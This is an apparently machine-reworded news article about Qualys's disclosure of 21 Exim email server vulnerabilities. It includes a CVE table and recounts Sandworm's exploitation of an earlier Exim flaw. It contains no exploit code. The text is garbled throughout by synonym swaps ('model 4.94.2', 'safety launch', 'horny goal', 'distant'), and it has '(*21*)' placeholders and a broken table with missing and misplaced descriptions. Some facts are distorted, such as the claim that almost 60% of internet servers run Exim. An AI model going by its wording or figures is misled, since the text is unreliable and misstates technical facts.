Security researchers found 21 flaws in this widely used email server, so update immediately

The maintainers of the widely-used Exim email server are urging admins to update to Exim model 4.94.2 because of 21 newly disclosed safety flaws. 

“All variations of Exim earlier to model 4.94.2 at the moment are out of date. The final 3.x launch was 3.36. It is out of date and shouldn’t be used,” the University of Cambridge-backed mission said in an update

“This is a safety launch,” the mission provides, referring to fixes for 21 flaws that may be exploited by anybody over the web. 

SEE: Network security policy (TechRepublic Premium)

The new Exim launch addresses safety flaws reported by researchers at security firm, Qualys.   

The bugs are a doubtlessly main risk to web safety given that almost 60% of internet servers run on Exim mail transfer agent (MTA) software and is by far essentially the most widely used email server. As Qualys factors out, IoT search engine Shodan returns 3.8 million outcomes for Exim servers uncovered on the web, of which two million are positioned in the US. 

Exim is so widely deployed in half as a result of it usually ships because the default email server with standard Linux distributions like Debian.  

“Exim Mail Servers are used so widely and deal with such a big quantity of the web’s site visitors that they’re usually a key goal for hackers,” mentioned Bharat Jogi, a senior supervisor of the vulnerability and risk analysis unit at Qualys.  

“The 21 vulnerabilities we found are crucial as attackers can remotely exploit them to achieve full root privileges on an Exim system – permitting compromises comparable to a distant attacker gaining full root privileges on the goal server and executing instructions to put in applications, modify information, create new accounts, and alter delicate settings on the mail servers.”

Jogi urged admins — a lot of whom run Exim servers at ISPs, authorities companies, and universities — to use the patches “immediately” given the breadth of the assault floor for this vulnerability.

Such flaws have been quickly exploited in the previous: a earlier distant code execution flaw in Exim that was patched in mid-2019 was additionally found by researchers at Qualys. 

The NSA finally revealed that attackers had been exploiting the flaw, tracked as CVE-2019-10149, inside two months of its public disclosure.  

The NSA warned in June 2020 {that a} hacking group referred to as Sandworm, inside Russia’s intelligence service, GRU, had been exploiting the Exim flaw since a minimum of August 2019. That bug’s impression is similar because the 21 newly disclosed vulnerabilities. 

The NSA mentioned the attackers exploited the bug on victims’ public-facing MTAs by sending a specifically crafted command in the “MAIL FROM” discipline of an SMTP (Simple Mail Transfer Protocol) message. Victims would then robotically obtain and execute a shell script from a website managed by the Sandworm group.

SEE: This malware has been rewritten in the Rust programming language to make it harder to spot

MTAs are a horny goal for attackers as a result of they’re typically uncovered on the web. 

Qualys has posted a blog detailing each of the 21 bugs and says its researchers have developed exploits to acquire full root privileges. 

The firm reported an preliminary set of bugs to Exim maintainers on 20 October, 2020 and supplied 26 patches to Exim.  

(*21*)

Arbitrary file deletion

(*21*)

Integer overflow in receive_add_recipient()

(*21*)

Failure to reset operate pointer after BDAT error

CVE

Description

Type

CVE-2020-28007

Link assault in Exim’s log listing

Local

CVE-2020-28008

Assorted assaults in Exim’s spool listing

Local

CVE-2020-28014

Arbitrary file creation and clobbering

Local

CVE-2021-27216

Local

CVE-2020-28011

Heap buffer overflow in queue_run()

Local

CVE-2020-28010

Heap out-of-bounds write in important()

Local

CVE-2020-28013

Heap buffer overflow in parse_fix_phrase()

Local

CVE-2020-28016

Heap out-of-bounds write in parse_fix_phrase()

Local

CVE-2020-28015

New-line injection into spool header file (native)

Local

CVE-2020-28012

Missing close-on-exec flag for privileged pipe

Local

CVE-2020-28009

Integer overflow in get_stdinput()

Local

CVE-2020-28017

Remote

CVE-2020-28020

Integer overflow in receive_msg()

Remote

CVE-2020-28023

Out-of-bounds learn in smtp_setup_msg()

Remote

CVE-2020-28021

New-line injection into spool header file (distant)

Remote

CVE-2020-28022

Heap out-of-bounds learn and write in extract_option()

Remote

CVE-2020-28026

Line truncation and injection in spool_read_header()

Remote

CVE-2020-28019

Remote

CVE-2020-28024

Heap buffer underflow in smtp_ungetc()

Remote

CVE-2020-28018

Use-after-free in tls-openssl.c

Remote

CVE-2020-28025

Heap out-of-bounds learn in pdkim_finish_bodyhash()

Remote

Related Posts